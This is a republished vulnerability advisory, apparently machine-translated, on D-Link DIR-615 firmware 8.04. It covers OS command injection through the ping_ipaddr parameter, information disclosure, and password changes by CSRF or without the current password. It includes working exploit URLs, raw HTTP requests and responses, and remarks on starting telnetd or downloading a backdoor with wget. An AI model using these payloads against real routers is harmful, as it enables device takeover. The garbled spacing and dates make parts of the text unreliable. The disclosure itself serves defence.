Multiple Remote Vulnerabilities in D-Link DIR-615

Release date:
Updated on:

Affected Systems:
D-Link DIR-615
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57882
 
D-Link Wireless N 300 Router (DIR-615) is a Wireless Router product.

The D-Link DIR-615 has multiple security vulnerabilities, such as remote OS command injection, information leakage, and cross-site Request Forgery, due to the lack of input verification check in the ping_ipaddr parameter, attackers can exploit these vulnerabilities to disclose sensitive information, perform arbitrary operations, and execute arbitrary commands in the context of the affected device.
 
<* Source: Michael Messner (michae.messner@integralis.com)

Link: http://www.s3cur1ty.de/m1adv2013-008
Http://www.osvdb.org/90174
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Device Name: DIR-615-Hardware revision H1
Vendor: D-Link

============= Device Description: ====================

Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network.

Source: http://www.dlink.com/us/en/support/product/dir-615-wireless-n-300-router

============= Vulnerable Firmware Releases: ==================

Firmware Version: 8.04, Tue, 4, Sep, 2012
Firmware Version: 8.04, Fri, 18, Jan, 2013

=========== Vulnerability Overview: ======================

* OS-Command Injection:
=> Parameter: ping_ipaddr

The vulnerability is caused by missing input validation in the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. it is possible to start a telnetd or upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Example Exploit:

Http: // <IP>/tools_vct.htm? Page = tools_vct & hping = 0 & ping_ipaddr = 1.1.1.1% 60 COMMAND % 60 & ping6_ipaddr =
Http: // <IP>/tools_vct.htm? Page = tools_vct & hping = 0 & ping_ipaddr = 1.1.1.1% 60 uname % 20-a % 60 & ping6_ipaddr =

Request:
GET/tools_vct.htm? Page = tools_vct & hping = 0 & ping_ipaddr = 1.1.1.1% 60 uname % 20-a % 60 & ping6_ipaddr = HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 18.0) Gecko/20100101 Firefox/18.0
Accept :*/*
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Referer: http: // 192.168.178.199/adv_virtual_batch.htm
Connection: keep-alive

Response:
HTTP/1.0 200 OK
Pragma: no-cache
Content-Type: text/html

<! Doctype html public "-// W3C // dtd html 4.01 Transitional // EN">
<Html>
<Head>
<Script type = "text/javascript" src = "common.js.htm"> </script>
<Script language = "javascript">
CommJs ({init: INC_COMM_PAGE, group: PAGE_GROUP_TOOLS });
Var pingResult = "Domain ";
Var pingip = "Listen 4_1.1.1.1linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <=
Var vctinfo = [
{Ethport: '0', status: '0', rate: '0', dup: '0 '},
{Ethport: '1', status: '0', rate: '0', dup: '0 '},
{Ethport: '2', status: '0', rate: '0', dup: '0 '},

You have wget on the device for downloading further tools.

* Information Disclosure:

Detailed device information with configuration details.

Request:
Http: // 192.168.178.199/gconfig.htm

Response:
Var ModelName = 'dir-615 '; var systemName = 'dlink-dir615'; var FunctionList = {region: 1, PRIORITY_WEB_ACCOUNT_NUM: 1, has_1_6_auto_config: 1, Region: 1, Region: 1, support_00006_dslite: 1, has_00006_6rd: 0, NON_USED: 0}

* For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

POST/tools_admin.htm HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.178.199/tools_admin.htm
Cookie: uid = wBIfbpFoJ9
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

Page = tools_admin & admin_password1 = admin & admin_password2 = admin & hostname = DIR-615

* CSRF for changing the password without knowing the current one:

Http: // 192.168.178.199/tools_admin.htm? Page = tools_admin & admin_password1 = admin2 & admin_password2 = admin2 & hostname = DIR-615

=============== Solution ==================

No known solution available.

============= Credits =================

The vulnerability was discovered by Michael Messner
Mail: devnull # at # s3cur1ty # dot # de
Web: http://www.s3cur1ty.de/advisories
Twitter: @ s3cur1ty_de

============= Time Line: ======================

November2012-discovered vulnerability
11.11.2012-contacted dlink via the webinterface http://www.dlink.com/us/en/support/contact-support
12.2012-contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012-D-link responded that they will check the findings * h00ray *
11.01.2013-requested status update
25.01.2013-requested status update
252.161.2013-D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix
Xx1_2.2013-no update from dlink, public release

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
D-Link
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.dlink.com/